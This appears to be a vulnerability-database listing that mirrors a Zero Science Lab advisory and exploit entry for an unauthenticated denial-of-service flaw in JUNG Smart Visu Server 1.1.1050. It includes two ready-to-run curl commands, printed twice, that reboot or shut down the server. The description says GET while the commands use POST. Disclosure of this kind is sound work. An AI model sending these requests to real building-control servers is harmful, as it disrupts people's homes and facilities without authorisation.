📄 JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown

Description

JUNG Smart Visu Server version 1.1.1050 suffers from a denial of service vulnerability. An unauthenticated attacker can reboot or shutdown the server by sending one GET request...

Visit Original Source

Basic Information

ID PACKETSTORM:215521

Published Feb 12, 2026 at 00:00

Affected Product

Affected Versions JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown

Vendor: ALBRECHT JUNG GMBH & CO. KG
Product web page: https://www.jung-group.com | https://www.jung.de
Affected version: 1.1.1050

Summary: The Smart Visu Server makes your intelligent building
control convenient. With the user-friendly operating concept,
you can control both the KNX system and other systems such as
Philips Hue or Sonos on your mobile devices. You can likewise
connect voice control to your KNX system with Amazon Alexa or
Google Assistant via the Smart Visu Server.

Desc: The device is suffering from a Denial of Service (DoS).
An unauthenticated attacker can reboot or shutdown the server
by sending one GET request.

Tested on: Jetty(9.2.12.v20150709)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5971
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php

07.02.2026

--

# Reboot server
$ curl -X POST "http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl" \
-H "User-Agent: thricer-engine/1.6" \
-d "{\"MSG_ID_TYPE\":\"MSG_REBOOT_REQ\"}"

# Shutdown server
$ curl -X POST "http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl" \
-H "User-Agent: thricer-engine/1.6" \
-d "{\"MSG_ID_TYPE\":\"MSG_HALT_REQ\"}"

{
    "lastseen": "2026-02-12T17:20:33",
    "description": "JUNG Smart Visu Server version 1.1.1050 suffers from a denial of service vulnerability. An unauthenticated attacker can reboot or shutdown the server by sending one GET request...",
    "published": "2026-02-12T00:00:00",
    "modified": "2026-02-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215521",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown\n    \n    \n    Vendor: ALBRECHT JUNG GMBH & CO. KG\n    Product web page: https://www.jung-group.com | https://www.jung.de\n    Affected version: 1.1.1050\n    \n    Summary: The Smart Visu Server makes your intelligent building\n    control convenient. With the user-friendly operating concept,\n    you can control both the KNX system and other systems such as\n    Philips Hue or Sonos on your mobile devices. You can likewise\n    connect voice control to your KNX system with Amazon Alexa or\n    Google Assistant via the Smart Visu Server.\n    \n    Desc: The device is suffering from a Denial of Service (DoS).\n    An unauthenticated attacker can reboot or shutdown the server\n    by sending one GET request.\n    \n    Tested on: Jetty(9.2.12.v20150709)\n    \n    \n    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                                @zeroscience\n    \n    \n    Advisory ID: ZSL-2026-5971\n    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php\n    \n    \n    07.02.2026\n    \n    --\n    \n    \n    # Reboot server\n    $ curl -X POST \"http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl\" \\\n     -H \"User-Agent: thricer-engine/1.6\" \\\n     -d \"{\\\"MSG_ID_TYPE\\\":\\\"MSG_REBOOT_REQ\\\"}\"\n    \n    \n    # Shutdown server\n    $ curl -X POST \"http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl\" \\\n     -H \"User-Agent: thricer-engine/1.6\" \\\n     -d \"{\\\"MSG_ID_TYPE\\\":\\\"MSG_HALT_REQ\\\"}\"",
    "sourceHref": "https://packetstorm.news/download/215521",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215521/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown_PACKETSTORM:215521

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply